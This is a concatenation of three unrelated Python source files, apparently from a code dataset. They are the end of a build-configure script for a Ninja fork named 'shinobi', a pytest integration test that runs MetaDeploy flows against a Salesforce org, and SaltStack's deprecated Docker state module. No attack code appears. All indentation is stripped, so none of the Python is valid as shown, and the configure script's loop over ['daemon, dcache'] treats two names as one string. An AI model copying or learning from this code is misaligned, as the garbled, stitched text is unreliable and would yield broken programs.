n.build(src('depfile_parser.cc'), 're2c', src('depfile_parser.in.cc'))
n.build(src('lexer.cc'), 're2c', src('lexer.in.cc'))
else:
print("warning: A compatible version of re2c (>= 0.11.3) was not found; "
"changes to src/*.in.cc will not affect your build.")
n.newline()
n.comment('Core source files all build into the daemon library')
cxxvariables = []
if platform.is_msvc():
cxxvariables = [('pdb', 'daemon.pdb')]
for name in ['daemon, dcache']:
objs += cxx(name, variables=cxxvariables)
if platform.is_msvc():
daemon_lib = n.build(built('daemon.lib'), 'ar', objs)
else:
daemon_lib = n.build(built('libdaemon.a'), 'ar', objs)
n.newline()
if platform.is_msvc():
libs.append('daemon.lib')
else:
libs.append('-ldaemon')
all_targets = []
n.comment('Distributed build support')
objs = cxx('daemon_exec', variables=cxxvariables)
all_targets += n.build(binary('daemon_exec'), 'link', objs, implicit=daemon_lib, variables=[('libs', libs)])
n.newline()
n.comment('Core source files all build into shinobi library.')
objs = []
cxxvariables = []
if platform.is_msvc():
cxxvariables = [('pdb', 'ninja.pdb')]
for name in ['build',
'build_log',
'clean',
'clparser',
'debug_flags',
'depfile_parser',
'deps_log',
'disk_interface',
'dyndep',
'dyndep_parser',
'edit_distance',
'eval_env',
'graph',
'graphviz',
'host_parser',
'lexer',
'line_printer',
'manifest_parser',
'metrics',
'parser',
'state',
'string_view_util',
'util',
'version']:
objs += cxx(name, variables=cxxvariables)
if platform.is_windows():
for name in ['subprocess-win32',
'includes_normalize-win32',
'msvc_helper-win32',
'msvc_helper_main-win32']:
objs += cxx(name, variables=cxxvariables)
if platform.is_msvc():
objs += cxx('minidump-win32', variables=cxxvariables)
objs += cc('getopt')
else:
objs += cxx('subprocess-posix')
if platform.is_aix():
objs += cc('getopt')
if platform.is_msvc():
shinobi_lib = n.build(built('shinobi.lib'), 'ar', objs)
else:
shinobi_lib = n.build(built('libshinobi.a'), 'ar', objs)
n.newline()
if platform.is_msvc():
libs.append('shinobi.lib')
else:
libs.append('-lshinobi')
if platform.is_aix() and not platform.is_os400_pase():
libs.append('-lperfstat')
n.comment('Main executable is library plus main() function.')
objs = cxx('ninja', variables=cxxvariables)
shinobi = n.build(binary('shinobi'), 'link', objs, implicit=shinobi_lib,
variables=[('libs', libs)])
n.newline()
all_targets += shinobi
if options.bootstrap:
# We've built the shinobi binary. Don't run any more commands
# through the bootstrap executor, but continue writing the
# build.ninja file.
n = shinobi_writer
n.comment('Tests all build into shinobi_test executable.')
objs = []
if platform.is_msvc():
cxxvariables = [('pdb', 'shinobi_test.pdb')]
for name in ['build_log_test',
'build_test',
'clean_test',
'clparser_test',
'dcache_test',
'depfile_parser_test',
'deps_log_test',
'dyndep_parser_test',
'disk_interface_test',
'edit_distance_test',
'graph_test',
'host_parser_test',
'lexer_test',
'manifest_parser_test',
'ninja_test',
'state_test',
'string_view_util_test',
'subprocess_test',
'test',
'util_test']:
objs += cxx(name, variables=cxxvariables)
if platform.is_windows():
for name in ['includes_normalize_test', 'msvc_helper_test']:
objs += cxx(name, variables=cxxvariables)
shinobi_test = n.build(binary('shinobi_test'), 'link', objs, implicit=shinobi_lib,
variables=[('libs', libs)])
n.newline()
all_targets += shinobi_test
n.comment('Ancillary executables.')
for name in ['build_log_perftest',
'canon_perftest',
'depfile_parser_perftest',
'hash_collision_bench',
'manifest_parser_perftest',
'clparser_perftest']:
if platform.is_msvc():
cxxvariables = [('pdb', name + '.pdb')]
objs = cxx(name, variables=cxxvariables)
all_targets += n.build(binary(name), 'link', objs,
implicit=shinobi_lib, variables=[('libs', libs)])
n.newline()
n.comment('Generate a graph using the "graph" tool.')
n.rule('gendot',
command='./shinobi -t graph all > $out')
n.rule('gengraph',
command='dot -Tpng $in > $out')
dot = n.build(built('graph.dot'), 'gendot', ['shinobi', 'build.ninja'])
n.build('graph.png', 'gengraph', dot)
n.newline()
n.comment('Generate the manual using asciidoc.')
n.rule('asciidoc',
command='asciidoc -b docbook -d book -o $out $in',
description='ASCIIDOC $out')
n.rule('xsltproc',
command='xsltproc --nonet doc/docbook.xsl $in > $out',
description='XSLTPROC $out')
docbookxml = n.build(built('manual.xml'), 'asciidoc', doc('manual.asciidoc'))
manual = n.build(doc('manual.html'), 'xsltproc', docbookxml,
implicit=[doc('style.css'), doc('docbook.xsl')])
n.build('manual', 'phony',
order_only=manual)
n.newline()
n.rule('dblatex',
command='dblatex -q -o $out -p doc/dblatex.xsl $in',
description='DBLATEX $out')
n.build(doc('manual.pdf'), 'dblatex', docbookxml,
implicit=[doc('dblatex.xsl')])
n.comment('Generate Doxygen.')
n.rule('doxygen',
command='doxygen $in',
description='DOXYGEN $in')
n.variable('doxygen_mainpage_generator',
src('gen_doxygen_mainpage.sh'))
n.rule('doxygen_mainpage',
command='$doxygen_mainpage_generator $in > $out',
description='DOXYGEN_MAINPAGE $out')
mainpage = n.build(built('doxygen_mainpage'), 'doxygen_mainpage',
['README', 'COPYING'],
implicit=['$doxygen_mainpage_generator'])
n.build('doxygen', 'doxygen', doc('doxygen.config'),
implicit=mainpage)
n.newline()
if not host.is_mingw():
n.comment('Regenerate build files if build script changes.')
n.rule('configure',
command='${configure_env}%s $root/configure.py $configure_args' %
options.with_python,
generator=True)
n.build('build.ninja', 'configure',
implicit=['$root/configure.py',
os.path.normpath('$root/misc/ninja_syntax.py')])
n.newline()
n.default(shinobi)
n.newline()
if host.is_linux():
n.comment('Packaging')
n.rule('rpmbuild',
command="misc/packaging/rpmbuild.sh",
description='Building rpms..')
n.build('rpm', 'rpmbuild')
n.newline()
n.build('all', 'phony', all_targets)
n.close()
print('wrote %s.' % BUILD_FILENAME)
if options.bootstrap:
print('bootstrap complete. rebuilding...')
rebuild_args = []
if platform.can_rebuild_in_place():
rebuild_args.append('./shinobi')
else:
if platform.is_windows():
bootstrap_exe = 'shinobi.bootstrap.exe'
final_exe = 'shinobi.exe'
else:
bootstrap_exe = './shinobi.bootstrap'
final_exe = './shinobi'
if os.path.exists(bootstrap_exe):
os.unlink(bootstrap_exe)
os.rename(final_exe, bootstrap_exe)
rebuild_args.append(bootstrap_exe)
if options.verbose:
rebuild_args.append('-v')
subprocess.check_call(rebuild_args)
|
py | 7dfa05177526591a4751773edc42692b1b6eab54 | """
These are end-to-end integration tests that touch stateful resources,
like a Salesforce org. They should be run with caution, and needn't be
run on every test run.
"""
from os import environ
import pytest
from django.core.exceptions import ImproperlyConfigured
from metadeploy.api.jobs import run_flows
from metadeploy.api.models import Job
def env(name):
try:
return environ[name]
except KeyError:
raise ImproperlyConfigured(
f"Cannot run integration tests. Missing environment variable: {name}."
)
@pytest.mark.integration
@pytest.mark.django_db
def test_can_reach_salesforce(
social_token_factory,
social_account_factory,
job_factory,
user_factory,
plan_factory,
step_factory,
version_factory,
product_factory,
):
# Ensure 12-factor-esque values are found:
INSTANCE_URL = env("TEST_INSTANCE_URL")
ORGANIZATION_ID = env("TEST_ORGANIZATION_ID")
TOKEN = env("TEST_TOKEN")
TOKEN_SECRET = env("TEST_TOKEN_SECRET")
user = user_factory(socialaccount_set=[])
social_account = social_account_factory(
user=user,
extra_data={
"instance_url": INSTANCE_URL,
"organization_details": {
"Id": ORGANIZATION_ID,
"Name": "Oddbird",
"OrganizationType": "Developer Edition",
},
},
socialtoken_set=[],
)
social_token_factory(account=social_account, token=TOKEN, token_secret=TOKEN_SECRET)
product = product_factory(repo_url="https://github.com/SFDO-Tooling/CumulusCI-Test")
version = version_factory(commit_ish="feature/preflight", product=product)
plan = plan_factory(version=version)
steps = [step_factory(plan=plan)]
job = job_factory(user=user)
run_flows(
user=user,
plan=plan,
skip_tasks=steps,
organization_url=INSTANCE_URL,
result_class=Job,
result_id=job.id,
)
|
py | 7dfa05abf1580dff82d0cf1f0b537438980a04bf | # -*- coding: utf-8 -*-
'''
Manage Docker containers
========================
.. deprecated:: 2015.8.0
Future feature development will be done only in :mod:`dockerng
<salt.states.dockerng>`. See the documentation for this module for
information on the deprecation path.
`Docker <https://www.docker.io>`_
is a lightweight, portable, self-sufficient software container
wrapper. The base supported wrapper type is
`LXC <https://en.wikipedia.org/wiki/Linux_Containers>`_,
`cgroups <https://en.wikipedia.org/wiki/Cgroups>`_, and the
`Linux Kernel <https://en.wikipedia.org/wiki/Linux_kernel>`_.
.. note::
This state module requires
`docker-py <https://github.com/dotcloud/docker-py>`_ version >= 0.6.0
which supports `Docker Remote API version 1.12
<http://docs.docker.io/en/latest/reference/api/docker_remote_api_v1.6>`_.
Available Functions
-------------------
- built
.. code-block:: yaml
corp/mysuperdocker_img:
docker.built:
- path: /path/to/dir/container
- pulled
.. code-block:: yaml
ubuntu:
docker.pulled:
- tag: latest
- pushed
.. code-block:: yaml
corp/mysuperdocker_img:
docker.pushed
- installed
.. code-block:: yaml
mysuperdocker-container:
docker.installed:
- name: mysuperdocker
- hostname: superdocker
- image: corp/mysuperdocker_img
- loaded
.. code-block:: yaml
mysuperdocker-file:
docker.loaded:
- name: mysuperdocker
- source: salt://_files/tmp/docker_image.tar
- running
.. code-block:: yaml
my_service:
docker.running:
- container: mysuperdocker
- image: corp/mysuperdocker_img
- ports:
- "5000/tcp":
HostIp: ""
HostPort: "5000"
.. note::
The ``ports`` argument above is a dictionary. The double
indentation is required for PyYAML to load the data structure
properly as a python dictionary. More information can be found
:ref:`here <nested-dict-indentation>`
- absent
.. code-block:: yaml
mys_old_uperdocker:
docker.absent
- run
.. code-block:: yaml
/finish-install.sh:
docker.run:
- cid: mysuperdocker
- unless: grep -q something /var/log/foo
- docker_unless: grep -q done /install_log
Use Cases
---------
Ensures the container is running with the latest image available
.. code-block:: yaml
my-service-image:
docker.pulled:
- name: registry/my-service:latest
- force: true
my-service-container:
docker.installed:
- image: registry/my-service:latest
- watch:
- docker: my-service-image
my-service:
docker.running:
- container: my-service-container
- watch:
- docker: my-service-container
.. note::
The docker modules are named ``dockerio`` because
the name 'docker' would conflict with the underlying docker-py library.
'''
from __future__ import absolute_import
import functools
import logging
# Import salt libs
from salt.ext.six import string_types
import salt.utils
import salt.ext.six as six
# Enable proper logging
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = 'docker'
def __virtual__():
'''
Only load if the dockerio execution module is available
'''
if 'docker.version' in __salt__:
return __virtualname__
return False
INVALID_RESPONSE = 'We did not get an acceptable answer from docker'
VALID_RESPONSE = ''
NOTSET = object()
def _ret_status(exec_status=None,
name='',
comment='',
result=None,
changes=None):
if not changes:
changes = {}
if exec_status is None:
exec_status = {}
if exec_status:
if result is None:
result = exec_status['status']
scomment = exec_status.get('comment', None)
if scomment:
comment += '\n' + scomment
out = exec_status.get('out', None)
if out:
if isinstance(out, string_types):
comment += '\n' + out
return {
'changes': changes,
'result': result,
'name': name,
'comment': comment,
}
def _valid(exec_status=None, name='', comment='', changes=None):
return _ret_status(exec_status=exec_status,
comment=comment,
name=name,
changes=changes,
result=True)
def _invalid(exec_status=None, name='', comment='', changes=None):
return _ret_status(exec_status=exec_status,
comment=comment,
name=name,
changes=changes,
result=False)
def _get_image_name(image, tag):
if ':' not in image:
# backward compatibility: name could be already tagged
return ':'.join((image, tag))
return image
def _parse_volumes(volumes):
'''
Parse a given volumes state specification for later use in
modules.docker.create_container(). This produces a dict that can be directly
consumed by the Docker API /containers/create.
Note: this only really exists for backwards-compatibility, and because
modules.dockerio.start() currently takes a binds argument.
volumes
A structure containing information about the volumes to be included in the
container that will be created, either:
- a bare dictionary
- a list of dictionaries and lists
.. code-block:: yaml
# bare dict style
- volumes:
/usr/local/etc/ssl/certs/example.crt:
bind: /etc/ssl/certs/com.example.internal.crt
ro: True
/var/run:
bind: /var/run/host/
ro: False
# list of dicts style:
- volumes:
- /usr/local/etc/ssl/certs/example.crt:
bind: /etc/ssl/certs/com.example.internal.crt
ro: True
- /var/run: /var/run/host/ # read-write bound volume
- /var/lib/mysql # un-bound, container-only volume
note: bind mounts specified like "/etc/timezone:/tmp/host_tz" will fall
through this parser.
Returns a dict of volume specifications:
.. code-block:: yaml
{
'bindvols': {
'/usr/local/etc/ssl/certs/example.crt': {
'bind': '/etc/ssl/certs/com.example.internal.crt',
'ro': True
},
'/var/run/': {
'bind': '/var/run/host',
'ro': False
},
},
'contvols': [ '/var/lib/mysql/' ]
}
'''
log.trace("Parsing given volumes dict: " + str(volumes))
bindvolumes = {}
contvolumes = []
if isinstance(volumes, dict):
# If volumes as a whole is a dict, then there's no way to specify a non-bound volume
# so we exit early and assume the dict is properly formed.
bindvolumes = volumes
if isinstance(volumes, list):
for vol in volumes:
if isinstance(vol, dict):
for volsource, voldef in vol.items():
if isinstance(voldef, dict):
target = voldef['bind']
read_only = voldef.get('ro', False)
else:
target = str(voldef)
read_only = False
source = volsource
else: # isinstance(vol, dict)
if ':' in vol:
volspec = vol.split(':')
source = volspec[0]
target = volspec[1]
read_only = False
try:
if len(volspec) > 2:
read_only = volspec[2] == "ro"
except IndexError:
pass
else:
contvolumes.append(str(vol))
continue
bindvolumes[source] = {
'bind': target,
'ro': read_only
}
result = {'bindvols': bindvolumes, 'contvols': contvolumes}
log.trace("Finished parsing volumes, with result: " + str(result))
return result
def mod_watch(name, sfun=None, *args, **kw):
if sfun == 'built':
# Needs to refresh the image
kw['force'] = True
build_status = built(name, **kw)
result = build_status['result']
status = _ret_status(build_status, name, result=result,
changes={name: result})
return status
elif sfun == 'installed':
# Throw away the old container and create a new one
remove_container = __salt__['docker.remove_container']
remove_status = _ret_status(remove_container(container=name,
force=True),
name=name)
installed_status = installed(name=name, **kw)
result = installed_status['result'] and remove_status['result']
comment = remove_status['comment']
status = _ret_status(installed_status, name=name,
result=result,
changes={name: result},
comment=comment)
return status
elif sfun == 'running':
# Force a restart or kill the container
container = kw.get('container', name)
kill_signal = kw.get('kill_signal')
if kill_signal:
killer = __salt__['docker.kill']
status = _ret_status(killer(container, signal=kill_signal),
name=name,
changes={name: True})
else:
restarter = __salt__['docker.restart']
status = _ret_status(restarter(container),
name=name,
changes={name: True})
return status
return {'name': name,
'changes': {},
'result': False,
'comment': ('watch requisite is not'
' implemented for {0}'.format(sfun))}
def pulled(name,
tag='latest',
force=False,
insecure_registry=False,
*args,
**kwargs):
'''
Pull an image from a docker registry. (`docker pull`)
.. note::
See first the documentation for `docker login`, `docker pull`,
`docker push`,
and `docker.import_image <https://github.com/dotcloud/docker-py#api>`_
(`docker import
<http://docs.docker.io/en/latest/reference/commandline/cli/#import>`_).
NOTE that we added in SaltStack a way to authenticate yourself with the
Docker Hub Registry by supplying your credentials (username, email &
password) using pillars. For more information, see salt.modules.dockerio
execution module.
name
Name of the image
tag
Tag of the image
force
Pull even if the image is already pulled
insecure_registry
Set to ``True`` to allow connections to non-HTTPS registries. Default ``False``.
'''
inspect_image = __salt__['docker.inspect_image']
image_name = _get_image_name(name, tag)
image_infos = inspect_image(image_name)
if image_infos['status'] and not force:
return _valid(
name=name,
comment='Image already pulled: {0}'.format(image_name))
if __opts__['test']:
comment = 'Image {0} will be pulled'.format(image_name)
return _ret_status(name=name, comment=comment)
previous_id = image_infos['out']['Id'] if image_infos['status'] else None
pull = __salt__['docker.pull']
returned = pull(name, tag=tag, insecure_registry=insecure_registry)
if previous_id != returned['id']:
changes = {name: {'old': previous_id,
'new': returned['id']}}
comment = 'Image {0} pulled'.format(image_name)
else:
changes = {}
comment = ''
return _ret_status(returned, name, changes=changes, comment=comment)
def pushed(name, tag='latest', insecure_registry=False):
'''
Push an image from a docker registry. (`docker push`)
.. note::
See first the documentation for `docker login`, `docker pull`,
`docker push`,
and `docker.import_image <https://github.com/dotcloud/docker-py#api>`_
(`docker import
<http://docs.docker.io/en/latest/reference/commandline/cli/#import>`_).
NOTE that we added in SaltStack a way to authenticate yourself with the
Docker Hub Registry by supplying your credentials (username, email
& password) using pillars. For more information, see
salt.modules.dockerio execution module.
name
Name of the image
tag
Tag of the image [Optional]
insecure_registry
Set to ``True`` to allow connections to non-HTTPS registries. Default ``False``.
'''
image_name = _get_image_name(name, tag)
if __opts__['test']:
comment = 'Image {0} will be pushed'.format(image_name)
return _ret_status(name=name, comment=comment)
push = __salt__['docker.push']
returned = push(name, tag=tag, insecure_registry=insecure_registry)
log.debug("Returned: "+str(returned))
if returned['status']:
changes = {name: {'Rev': returned['id']}}
else:
changes = {}
return _ret_status(returned, name, changes=changes)
def loaded(name, tag='latest', source=None, source_hash='', force=False):
'''
Load an image into the local docker registry (`docker load`)
name
Name of the docker image
tag
tag of the image (defaults to 'latest')
source
The source .tar file to download to the minion, created by docker save
this source file can be hosted on either the salt master server,
or on an HTTP or FTP server.
If the file is hosted on a HTTP or FTP server then the source_hash
argument is also required
.. note::
See first the documentation for Salt `file.managed
<http://docs.saltstack.com/en/latest/ref/states/all/salt.states.file.html#salt.states.file.managed>`_
source_hash
This can be one of the following:
1. a source hash string
2. the URI of a file that contains source hash strings
force
Load even if the image exists
'''
inspect_image = __salt__['docker.inspect_image']
image_name = _get_image_name(name, tag)
image_infos = inspect_image(image_name)
if image_infos['status'] and not force:
return _valid(
name=name,
comment='Image already loaded: {0}'.format(image_name))
if __opts__['test']:
comment = 'Image {0} will be loaded'.format(image_name)
return _ret_status(name=name, comment=comment)
tmp_filename = salt.utils.mkstemp()
__salt__['state.single']('file.managed',
name=tmp_filename,
source=source,
source_hash=source_hash)
changes = {}
if image_infos['status']:
changes['old'] = image_infos['out']['Id']
remove_image = __salt__['docker.remove_image']
remove_info = remove_image(image_name)
if not remove_info['status']:
return _invalid(name=name,
comment='Image could not be removed: {0}'.format(name))
load = __salt__['docker.load']
returned = load(tmp_filename)
image_infos = inspect_image(image_name)
if image_infos['status']:
changes['new'] = image_infos['out']['Id']
else:
return _invalid(
name=name,
comment='Image {0} was not loaded into docker'.format(image_name))
return _ret_status(returned, name, changes=changes)
def built(name,
tag='latest',
path=None,
quiet=False,
nocache=False,
rm=True,
force=False,
timeout=None,
*args, **kwargs):
'''
Build a docker image from a path or URL to a dockerfile. (`docker build`)
name
Name of the image
tag
tag of the image (defaults to 'latest')
path
URL (e.g. `url/branch/docker_dir/dockerfile`)
or filesystem path to the dockerfile
'''
inspect_image = __salt__['docker.inspect_image']
image_name = _get_image_name(name, tag)
image_infos = inspect_image(image_name)
if image_infos['status'] and not force:
return _valid(
name=name,
comment='Image already built: {0}, id: {1}'.format(
image_name, image_infos['out']['Id']))
if __opts__['test']:
comment = 'Image {0} will be built'.format(image_name)
return {'name': name,
'changes': {},
'result': None,
'comment': comment}
previous_id = image_infos['out']['Id'] if image_infos['status'] else None
build = __salt__['docker.build']
kw = dict(tag=image_name,
path=path,
quiet=quiet,
nocache=nocache,
rm=rm,
timeout=timeout,
)
returned = build(**kw)
if previous_id != returned['id']:
changes = {name: {'old': previous_id,
'new': returned['id']}}
comment = 'Image {0} built'.format(image_name)
else:
changes = {}
comment = ''
return _ret_status(exec_status=returned,
name=name,
changes=changes,
comment=comment)
def installed(name,
image,
tag='latest',
command=None,
hostname=None,
user=None,
detach=True,
stdin_open=False,
tty=False,
mem_limit=None,
ports=None,
environment=None,
dns=None,
volumes=None,
volumes_from=None,
cpu_shares=None,
cpuset=None,
*args, **kwargs):
'''
Ensure that a container with the given name exists;
if not, build a new container from the specified image.
(`docker run`)
name
Name for the container
image
Image from which to build this container
tag
tag of the image (defaults to 'latest')
environment
Environment variables for the container, either
- a mapping of key, values
- a list of mappings of key, values
ports
List of ports definitions, either:
- a port to map
- a mapping of mapping portInHost : PortInContainer
volumes
List of volumes (see notes for the running function)
For other parameters, see absolutely first the salt.modules.dockerio
execution module and the `docker-py python bindings for docker
documentation <https://github.com/dotcloud/docker-py#api>`_ for
`docker.create_container`.
.. note::
This command does not verify that the named container
is running the specified image.
'''
ins_image = __salt__['docker.inspect_image']
ins_container = __salt__['docker.inspect_container']
create = __salt__['docker.create_container']
image_name = _get_image_name(image, tag)
iinfos = ins_image(image_name)
if not iinfos['status']:
return _invalid(comment='Image "{0}" does not exist'.format(image_name))
cinfos = ins_container(name)
already_exists = cinfos['status']
# if container exists but is not started, try to start it
if already_exists:
return _valid(comment='Container {0!r} already exists'.format(name))
dports, denvironment = {}, {}
if __opts__['test']:
comment = 'Container {0!r} will be created'.format(name)
return _ret_status(name=name, comment=comment)
if not ports:
ports = []
if not volumes:
volumes = []
if isinstance(environment, dict):
for k in environment:
denvironment[six.text_type(k)] = six.text_type(environment[k])
if isinstance(environment, list):
for p in environment:
if isinstance(p, dict):
for k in p:
denvironment[six.text_type(k)] = six.text_type(p[k])
for p in ports:
if not isinstance(p, dict):
dports[str(p)] = {}
else:
for k in p:
dports[str(p)] = {}
parsed_volumes = _parse_volumes(volumes)
bindvolumes = parsed_volumes['bindvols']
contvolumes = parsed_volumes['contvols']
kw = dict(
binds=bindvolumes,
command=command,
hostname=hostname,
user=user,
detach=detach,
stdin_open=stdin_open,
tty=tty,
mem_limit=mem_limit,
ports=dports,
environment=denvironment,
dns=dns,
volumes=contvolumes,
volumes_from=volumes_from,
name=name,
cpu_shares=cpu_shares,
cpuset=cpuset)
out = create(image_name, **kw)
# if container has been created, even if not started, we mark
# it as installed
changes = 'Container created'
try:
cid = out['out']['info']['id']
except Exception as e:
log.debug(str(e))
else:
changes = 'Container {0} created'.format(cid)
out['comment'] = changes
ret = _ret_status(out, name, changes=changes)
return ret
def absent(name):
'''
Ensure that the container is absent; if not, it will
will be killed and destroyed. (`docker inspect`)
name:
Either the container name or id
'''
ins_container = __salt__['docker.inspect_container']
cinfos = ins_container(name)
changes = {}
if cinfos['status']:
cid = cinfos['id']
changes[cid] = {}
is_running = __salt__['docker.is_running'](cid)
if __opts__['test']:
comment = 'Container {0!r} will be stopped and destroyed'.format(cid)
return _ret_status(name=name, comment=comment)
# Stop container gracefully, if running
if is_running:
changes[cid]['old'] = 'running'
__salt__['docker.stop'](cid)
is_running = __salt__['docker.is_running'](cid)
if is_running:
return _invalid(comment=("Container {0!r} could not be stopped"
.format(cid)))
else:
__salt__['docker.remove_container'](cid)
is_gone = __salt__['docker.exists'](cid)
if is_gone:
return _valid(comment=('Container {0!r}'
' was stopped and destroyed, '.format(cid)),
changes={name: True})
else:
return _valid(comment=('Container {0!r}'
' was stopped but could not be destroyed,'.format(cid)),
changes={name: True})
else:
__salt__['docker.remove_container'](cid)
is_gone = __salt__['docker.exists'](cid)
if is_gone:
return _valid(comment=('Container {0!r}'
'is stopped and was destroyed, '.format(cid)),
changes={name: True})
else:
return _valid(comment=('Container {0!r}'
' is stopped but could not be destroyed,'.format(cid)),
changes={name: True})
else:
return _valid(comment="Container {0!r} not found".format(name))
def present(name, image=None, tag='latest', is_latest=False):
'''
If a container with the given name is not present, this state will fail.
Supports optionally checking for specific image/tag
(`docker inspect`)
name:
container id
image:
image the container should be running (defaults to any)
tag:
tag of the image (defaults to 'latest')
is_latest:
also check if the container runs the latest version of the image (
latest defined as the latest pulled onto the local machine)
'''
ins_container = __salt__['docker.inspect_container']
cinfos = ins_container(name)
if 'id' in cinfos:
cid = cinfos['id']
else:
cid = name
if not cinfos['status']:
return _invalid(comment='Container {0} not found'.format(cid or name))
if cinfos['status'] and image is None:
return _valid(comment='Container {0} exists'.format(cid))
image_name = _get_image_name(image, tag)
if cinfos['status'] and cinfos['out']['Config']["Image"] == image_name and not is_latest:
return _valid(comment='Container {0} exists and has image {1}'.format(cid, image_name))
ins_image = __salt__['docker.inspect_image']
iinfos = ins_image(image_name)
if cinfos['status'] and cinfos['out']['Image'] == iinfos['out']['Id']:
return _valid(comment='Container {0} exists and has latest version of image {1}'.format(cid, image_name))
return _invalid(comment='Container {0} found with wrong image'.format(cid or name))
def run(name,
cid=None,
hostname=None,
onlyif=None,
unless=None,
docked_onlyif=None,
docked_unless=None,
*args, **kwargs):
'''
Run a command in a specific container
You can match by either name or hostname
name
command to run in the container
cid
Container id or name
state_id
state_id
onlyif
Only execute cmd if statement on the host returns 0
unless
Do not execute cmd if statement on the host returns 0
docked_onlyif
Only execute cmd if statement in the container returns 0
docked_unless
Do not execute cmd if statement in the container returns 0
'''
if hostname:
salt.utils.warn_until(
'Helium',
'The \'hostname\' argument has been deprecated.'
)
retcode = __salt__['docker.retcode']
drun_all = __salt__['docker.run_all']
valid = functools.partial(_valid, name=name)
if onlyif is not None:
if not isinstance(onlyif, string_types):
if not onlyif:
return valid(comment='onlyif execution failed')
elif isinstance(onlyif, string_types):
if not __salt__['cmd.retcode'](onlyif) == 0:
return valid(comment='onlyif execution failed')
if unless is not None:
if not isinstance(unless, string_types):
if unless:
return valid(comment='unless execution succeeded')
elif isinstance(unless, string_types):
if __salt__['cmd.retcode'](unless) == 0:
return valid(comment='unless execution succeeded')
if docked_onlyif is not None:
if not isinstance(docked_onlyif, string_types):
if not docked_onlyif:
return valid(comment='docked_onlyif execution failed')
elif isinstance(docked_onlyif, string_types):
if not retcode(cid, docked_onlyif):
return valid(comment='docked_onlyif execution failed')
if docked_unless is not None:
if not isinstance(docked_unless, string_types):
if docked_unless:
return valid(comment='docked_unless execution succeeded')
elif isinstance(docked_unless, string_types):
if retcode(cid, docked_unless):
return valid(comment='docked_unless execution succeeded')
if __opts__['test']:
comment = 'Command {0!r} will be executed on container {1}'.format(name, cid)
return _ret_status(name=name, comment=comment)
result = drun_all(cid, name)
if result['status']:
return valid(comment=result['comment'])
else:
return _invalid(comment=result['comment'], name=name)
def script(*args, **kw):
'''
Placeholder function for a cmd.script alike.
.. note::
Not yet implemented.
Its implementation might be very similar from
:mod:`salt.states.dockerio.run`
'''
raise NotImplementedError
def running(name,
image,
tag='latest',
container=None,
command=None,
hostname=None,
user=None,
detach=True,
stdin_open=False,
tty=False,
mem_limit=None,
ports=None,
environment=None,
dns=None,
volumes=None,
volumes_from=None,
start=True,
cap_add=None,
cap_drop=None,
privileged=None,
lxc_conf=None,
network_mode=None,
check_is_running=True,
publish_all_ports=False,
links=None,
restart_policy=None,
cpu_shares=None,
cpuset=None,
kill_signal=None,
*args, **kwargs):
'''
Ensure that a container is running. If the container does not exist, it
will be created from the specified image. (`docker run`)
name / container
Name for the container
image
Image from which to build this container
tag
tag of the image (defaults to 'latest')
environment
Environment variables for the container, either
- a mapping of key, values
- a list of mappings of key, values
ports
List of ports definitions, either:
- a port to map
- a mapping of mapping portInHost : PortInContainer
.. code-block:: yaml
- ports:
- "5000/tcp":
HostIp: ""
HostPort: "5000"
publish_all_ports
Publish all ports from the port list (default is false,
only meaningful if port does not contain portinhost:portincontainer mapping)
volumes
List of volumes to mount or create in the container (like ``-v`` of ``docker run`` command),
mapping host directory to container directory.
To specify a volume in the container in terse list format:
.. code-block:: yaml
- volumes:
- "/var/log/service" # container-only volume
- "/srv/timezone:/etc/timezone" # bound volume
- "/usr/local/etc/passwd:/etc/passwd:ro" # read-only bound volume
You can also use the short dictionary form (note that the notion of
source:target from docker is preserved):
.. code-block:: yaml
- volumes:
- /var/log/service: /var/log/service # mandatory read-write implied
Or, alternatively, to specify read-only mounting, use the extended form:
.. code-block:: yaml
- volumes:
- /home/user1:
bind: /mnt/vol2
ro: True
- /var/www:
bind: /mnt/vol1
ro: False
Or (for backwards compatibility) another dict style:
.. code-block:: yaml
- volumes:
/home/user1:
bind: /mnt/vol2
ro: True
/var/www:
bind: /mnt/vol1
ro: False
volumes_from
List of containers to share volumes with
dns
List of DNS servers.
.. code-block:: yaml
- dns:
- 127.0.0.1
network_mode
- 'bridge': creates a new network stack for the container on the docker bridge
- 'none': no networking for this container
- 'container:[name|id]': reuses another container network stack)
- 'host': use the host network stack inside the container
.. code-block:: yaml
- network_mode: host
restart_policy
Restart policy to apply when a container exits (no, on-failure[:max-retry], always)
.. code-block:: yaml
- restart_policy:
MaximumRetryCount: 5
Name: on-failure
cap_add
List of capabilities to add in a container.
cap_drop
List of capabilities to drop in a container.
check_is_running
Enable checking if a container should run or not.
Useful for data-only containers that must be linked to another one.
e.g. nginx <- static-files
cpu_shares
CPU shares (relative weight)
.. code-block:: yaml
- cpu_shares: 2
cpuset
CPUs in which to allow execution ('0-3' or '0,1')
.. code-block:: yaml
- cpuset: '0-3'
kill_signal
If defined, its value will be sent as a kill signal to the running
container. i.e. It will use client.kill(signal=kill_signal)
instead of client.restart(), when the state is triggered by a watcher
requisite.
possible use case: Soft reload of nginx
.. code-block:: yaml
nginx:
docker.running:
- image: some-fictional-registry.com/nginx
- tag: latest
- kill_signal: SIGHUP
- watch:
- file: /etc/nginx/nginx.conf
This state will ask nginx to reload (instead of restart)
each time the /etc/nginx/nginx.conf is modified.
.. versionadded:: 2015.8.0
For other parameters, see salt.modules.dockerio execution module
and the docker-py python bindings for docker documentation
<https://github.com/dotcloud/docker-py#api>`_ for
`docker.create_container`.
.. note::
This command does not verify that the named container
is running the specified image.
'''
if container is None:
container = name
ins_image = __salt__['docker.inspect_image']
ins_container = __salt__['docker.inspect_container']
create = __salt__['docker.create_container']
image_name = _get_image_name(image, tag)
iinfos = ins_image(image_name)
image_exists = iinfos['status']
if not image_exists:
return _invalid(comment='image "{0}" does not exists'.format(image_name))
cinfos = ins_container(name)
already_exists = cinfos['status']
already_exists_with_same_image = (
# if container is known by name,
already_exists
# and the container is based on expected image,
and cinfos['out']['Image'] == iinfos['out']['Id']
# then assume it already exists.
)
is_running = __salt__['docker.is_running'](container)
# if container exists but is not started, try to start it
if already_exists_with_same_image and (is_running or not start):
return _valid(comment='container {0!r} already exists'.format(name))
if not already_exists_with_same_image and already_exists:
# Outdated container: It means it runs against an old image.
# We're gonna have to stop and remove the old container, to let
# the name available for the new one.
if __opts__['test']:
comment = 'Will replace outdated container {0!r}'.format(name)
return _ret_status(name=name, comment=comment)
if is_running:
stop_status = __salt__['docker.stop'](name)
if not stop_status['status']:
return _invalid(comment='Failed to stop outdated container {0!r}'.format(name))
remove_status = __salt__['docker.remove_container'](name)
